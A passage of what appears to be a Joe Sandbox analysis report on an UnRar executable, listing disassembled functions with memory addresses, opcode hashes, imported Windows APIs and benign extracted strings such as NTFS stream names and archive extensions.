                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 15d8c670dcc426efe16c64a8b4d68e622923e4b2cd2612301cf06667d0d779f3
                                                            • Instruction ID: 5f736fbf4d06d626ab6edcd2fbbe8ccb9c3a076fb00938b6966722ba8aa85b07
                                                            • Opcode Fuzzy Hash: 15d8c670dcc426efe16c64a8b4d68e622923e4b2cd2612301cf06667d0d779f3
                                                            • Instruction Fuzzy Hash: B131E2B36203F487F3448E1A5860A69BBE4F38DB51F859025FF8157745CB39D862DB90
                                                            Function 00007FF7AACE22D8 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
                                                            • Instruction ID: e9ae33da56ccdae2a7b21c26738ed8c66f257410762905ab74ea3b9daff56091
                                                            • Opcode Fuzzy Hash: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
                                                            • Instruction Fuzzy Hash: 8DF0B765E1E406C2FF78322C581933991499B30314FE684B6D06AC62E5F87DAA923B29
                                                            Function 00007FF7AACF1F20 Relevance: .0, Instructions: 2COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2c61ea9d27a189495373fdf381af610ef955e34aa72d552fb3676856a0ea5555
                                                            • Instruction ID: c12e6a5bb435cda285eb478b4295d77aa3a3ebbd8a1669967e035405b9fad133
                                                            • Opcode Fuzzy Hash: 2c61ea9d27a189495373fdf381af610ef955e34aa72d552fb3676856a0ea5555
                                                            • Instruction Fuzzy Hash: 8CA00222D2EE43D0F654AB11E86403CB330FB90740FD200B2D15E964B89F3DE442C324
                                                            Function 00007FF7AACC35A4 Relevance: 26.4, APIs: 1, Strings: 14, Instructions: 100COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
                                                            • API String ID: 3668304517-727060406
                                                            • Opcode ID: b358b1c065c10631e8d72b8cb15d03f9fc9d98ba5afaa3510bdd8a441a54876f
                                                            • Instruction ID: d8e4c4df3afaa30a0dc2bb2d436bd75400e283207881827da0ae286a0c496778
                                                            • Opcode Fuzzy Hash: b358b1c065c10631e8d72b8cb15d03f9fc9d98ba5afaa3510bdd8a441a54876f
                                                            • Instruction Fuzzy Hash: 98410E36B06B41D9FB109F60E4442EDB3B5EB08364B821276DAAD13BA8EE38D556C350
                                                            Function 00007FF7AACF1600 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                            • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                            • API String ID: 2565136772-3242537097
                                                            • Opcode ID: 5ad63a7accf006474871eea26048ff24458d5b983e163d077946948f4ee46f43
                                                            • Instruction ID: d81aaa60b322eaa9a12f3d6750fa51bf4063745a3e551aed3606678f2f4514e6
                                                            • Opcode Fuzzy Hash: 5ad63a7accf006474871eea26048ff24458d5b983e163d077946948f4ee46f43
                                                            • Instruction Fuzzy Hash: ED21EE25E0FB03C1FA55BB11EC6417DE2A1EF54741FCA04B5CA9E466B8DE2CA45BC720
                                                            Function 00007FF7AACE387C Relevance: 18.0, APIs: 1, Strings: 9, Instructions: 493COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %ls$%ls%ls%ls$%s$ $ $ $ $%s $%s: %s
                                                            • API String ID: 0-2654841397
                                                            • Opcode ID: 711ed53e8eef9539110ee379f3cf56972affa2abfb9c5805c4bcf8a90e8b6f55
                                                            • Instruction ID: c7431d17688b15a068e88ee2190c2b2bf4e0f4d54ee8d7f0eef5871edbfb89f5
                                                            • Opcode Fuzzy Hash: 711ed53e8eef9539110ee379f3cf56972affa2abfb9c5805c4bcf8a90e8b6f55
                                                            • Instruction Fuzzy Hash: A2126C21E0F142C5F6797568C668238D6429FA1740EDA85BAC50E1A7F9CE2EBD077331
                                                            Function 00007FF7AACFDEB0 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                            • API String ID: 3215553584-2617248754
                                                            • Opcode ID: 0f877088771f64d8e5fe6b3fd7445beb0acbf590ed6b845dbec7e08ea622a804
                                                            • Instruction ID: f43381cf4217f5e79a971e864129ece2ed1bf8352586bbe3692dc95750786925
                                                            • Opcode Fuzzy Hash: 0f877088771f64d8e5fe6b3fd7445beb0acbf590ed6b845dbec7e08ea622a804
                                                            • Instruction Fuzzy Hash: 08418C32A06B86C9F704DB25E8517AD77A4EB18388F824576DEAD07B69DE38D026C350
                                                            Function 00007FF7AACD252C Relevance: 14.5, APIs: 6, Strings: 2, Instructions: 476COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                            • String ID: UNC$\\?\
                                                            • API String ID: 4097890229-253988292
                                                            • Opcode ID: f8f9ab572b28a2cd69eab9f8cdbbdc0c1c38e34a0d990b14a284ab92b8085e2a
                                                            • Instruction ID: 226d9b22b5ce54c3bacb310bb970f438e2b714da130d3d1221d26fde690cdce5
                                                            • Opcode Fuzzy Hash: f8f9ab572b28a2cd69eab9f8cdbbdc0c1c38e34a0d990b14a284ab92b8085e2a
                                                            • Instruction Fuzzy Hash: A122C132A1AB82C1FA10EB64E4441ADE371FB84794F925271DA9D13BE9EF7CD586C310
                                                            Function 00007FF7AACF42EC Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 2940173790-393685449
                                                            • Opcode ID: 22d70f7efa24dfe05bcdd46b72e888f66afb326cdb03c5f4ee978928620ad444
                                                            • Instruction ID: f3d71568e1a2e19d1a7a200517b457038aac72a98eb8c661373218cdc22ad7c0
                                                            • Opcode Fuzzy Hash: 22d70f7efa24dfe05bcdd46b72e888f66afb326cdb03c5f4ee978928620ad444
                                                            • Instruction Fuzzy Hash: 82E1B03390A783CAF710AF24D4A02ADBBA0FB45758F964176DA8D577A5DF38E482C710
                                                            Function 00007FF7AACD34EC Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 224COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID: .rar$exe$rar$rar$sfx
                                                            • API String ID: 3668304517-3472988566
                                                            • Opcode ID: aedc549ac03784cad813cd58363a7ad93c7d11d75e978689ff95c79a5e7afc0a
                                                            • Instruction ID: 993a17c79138ade0268549472e14d0f3d5597d223d3c546ae97ef7eeb3c80cf7
                                                            • Opcode Fuzzy Hash: aedc549ac03784cad813cd58363a7ad93c7d11d75e978689ff95c79a5e7afc0a
                                                            • Instruction Fuzzy Hash: B891D166A1AA46C0FB00AB25D5453ACA360FB40BA8F861275CE5E077F9DF3CD447C360
                                                            Function 00007FF7AACF5DEC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7AACF5FF3,?,?,?,00007FF7AACF3D5E,?,?,?,00007FF7AACF3D19), ref: 00007FF7AACF5E71
                                                            • GetLastError.KERNEL32(?,?,00000000,00007FF7AACF5FF3,?,?,?,00007FF7AACF3D5E,?,?,?,00007FF7AACF3D19), ref: 00007FF7AACF5E7F
                                                            • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7AACF5FF3,?,?,?,00007FF7AACF3D5E,?,?,?,00007FF7AACF3D19), ref: 00007FF7AACF5EA9
                                                            • FreeLibrary.KERNEL32(?,?,00000000,00007FF7AACF5FF3,?,?,?,00007FF7AACF3D5E,?,?,?,00007FF7AACF3D19), ref: 00007FF7AACF5EEF
                                                            • GetProcAddress.KERNEL32(?,?,00000000,00007FF7AACF5FF3,?,?,?,00007FF7AACF3D5E,?,?,?,00007FF7AACF3D19), ref: 00007FF7AACF5EFB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                            • String ID: api-ms-
                                                            • API String ID: 2559590344-2084034818
                                                            • Opcode ID: 4651ccb77694ea611dbdfda55042e91f51e01ca9cc5889ecfa2359b48fb16045
                                                            • Instruction ID: bcafc73f17ce8024dcc948af48037be189eacd85d951e5807abc59ee00000f12
                                                            • Opcode Fuzzy Hash: 4651ccb77694ea611dbdfda55042e91f51e01ca9cc5889ecfa2359b48fb16045
                                                            • Instruction Fuzzy Hash: 99310522B1BB46D1FE11AB02A51017DA394BF48B60F9B0179DE2E47BA4DF3CE4428721
                                                            Function 00007FF7AACE280C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateEventHandle$ErrorLast
                                                            • String ID: rar -ioff
                                                            • API String ID: 4151682896-4089728129
                                                            • Opcode ID: 12835f6ed0405a919fbf1cf35eea57182ad3bd948f802a26ef885efda41721df
                                                            • Instruction ID: 95f2cc36fa0323a7ce99f30a6cd5fa39aab6e1d633e6af60037a47ded74957a1
                                                            • Opcode Fuzzy Hash: 12835f6ed0405a919fbf1cf35eea57182ad3bd948f802a26ef885efda41721df
                                                            • Instruction Fuzzy Hash: C801E825E0BA46C6FB28BB71A815679A290FF58701BC645B5C9AE4667C9F3C600B8720
                                                            Function 00007FF7AACE2648 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 26libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                            • API String ID: 667068680-1824683568
                                                            • Opcode ID: a24bc5fe7971ef57a08fca0e13ab30d3266154e39d8f73d58a24b3fc5b0e2b43
                                                            • Instruction ID: e4c216a5c36bdbe66e7cc960584f2f0af9712370d03cfcc8562a6c592dd84b91
                                                            • Opcode Fuzzy Hash: a24bc5fe7971ef57a08fca0e13ab30d3266154e39d8f73d58a24b3fc5b0e2b43
                                                            • Instruction Fuzzy Hash: D4F03064A0EB03D1FE14AB24F844179A360EF59B84BC65074C8AF4637CEE3CE09AC720
                                                            Function 00007FF7AACC287C Relevance: 9.4, APIs: 6, Instructions: 386COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                            • String ID:
                                                            • API String ID: 4097890229-0
                                                            • Opcode ID: 9d8941ffb0ed94d4cbd89dfd51820ad61874e82b015c2e30a89c2a06bc84a652
                                                            • Instruction ID: 9f44840e187cc1dd44a9477fb2b6469ca45870e51fcceb12b5d565f1bd112a75
                                                            • Opcode Fuzzy Hash: 9d8941ffb0ed94d4cbd89dfd51820ad61874e82b015c2e30a89c2a06bc84a652
                                                            • Instruction Fuzzy Hash: 4B028D62A167C6D9FB20FF24D8403ECA321FB45754F815271DA6C1AAEAEF38D646C310
                                                            Function 00007FF7AACC4908 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 498COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                            • String ID: *.*
                                                            • API String ID: 73155330-438819550
                                                            • Opcode ID: e37dbce87ec027825e7cf87d0a8fcd4540ec30b5f4320715de177872a24caed8
                                                            • Instruction ID: 989bfdbc2b0ded9b5862640f38bf915d3debc4e2e4b1d2077d9670b89fbcecbf
                                                            • Opcode Fuzzy Hash: e37dbce87ec027825e7cf87d0a8fcd4540ec30b5f4320715de177872a24caed8
                                                            • Instruction Fuzzy Hash: BD22BE22B0AB82C5FB20AF25D5442ADA3A1FB44794F925275DE6D07BE9DF3CE452C310
                                                            Function 00007FF7AACBE118 Relevance: 9.2, APIs: 6, Instructions: 209COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: LoadStringfflush
                                                            • String ID:
                                                            • API String ID: 2360701518-0
                                                            • Opcode ID: a525354551de69564a2113c673b54bed6f8a794e49b269853dbbceec935b36c4
                                                            • Instruction ID: d8f1afb69deb4fb8612fb7d1524cab58aff67ab9677a69c8195f03683582108c
                                                            • Opcode Fuzzy Hash: a525354551de69564a2113c673b54bed6f8a794e49b269853dbbceec935b36c4
                                                            • Instruction Fuzzy Hash: 4881D562F1A742C5FA00EB75D4541BDA361AF40BA4F915270EA6E177EADF3DE442C310
                                                            Function 00007FF7AACE2DF4 Relevance: 9.1, APIs: 6, Instructions: 120timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF7AACCE08C: GetVersionExW.KERNEL32 ref: 00007FF7AACCE0BD
